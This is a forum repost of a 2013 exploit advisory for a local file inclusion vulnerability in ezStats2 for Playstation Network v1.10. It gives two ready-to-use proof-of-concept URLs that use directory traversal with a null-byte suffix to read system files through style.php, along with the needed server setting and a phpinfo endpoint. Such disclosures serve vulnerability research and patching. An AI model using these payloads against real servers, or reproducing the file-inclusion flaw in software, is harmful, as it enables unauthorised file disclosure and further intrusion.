Praetorian503 Posted February 6, 2013 Report Posted February 6, 2013 ezStats2 for Playstation Network version 1.10 suffers from a local file inclusion vulnerability.#################################################### Exploit Title: ezStats2 for Playstation Network v1.10 Local File Inclusion Vulnerability### Date: 02/05/2013### Author: L0n3ly-H34rT### Contact: l0n3ly_h34rt@hotmail.com### My Site: http://se3c.blogspot.com/### Vendor Link: http://www.ezstats.org/### Software Link: http://ezstats.googlecode.com/files/ezStats2_PSN_v1.10.zip### Tested on: Linux/Windows #################################################http://127.0.0.1/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpghttp://127.0.0.1/ezStats2_psn/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg############################################# Notes :1- Must be magic_quotes_gpc = Off2- phpinfo() :http://127.0.0.1/psn/admin/apitest.php?info# Greetz to my friendzSource: PacketStorm Quote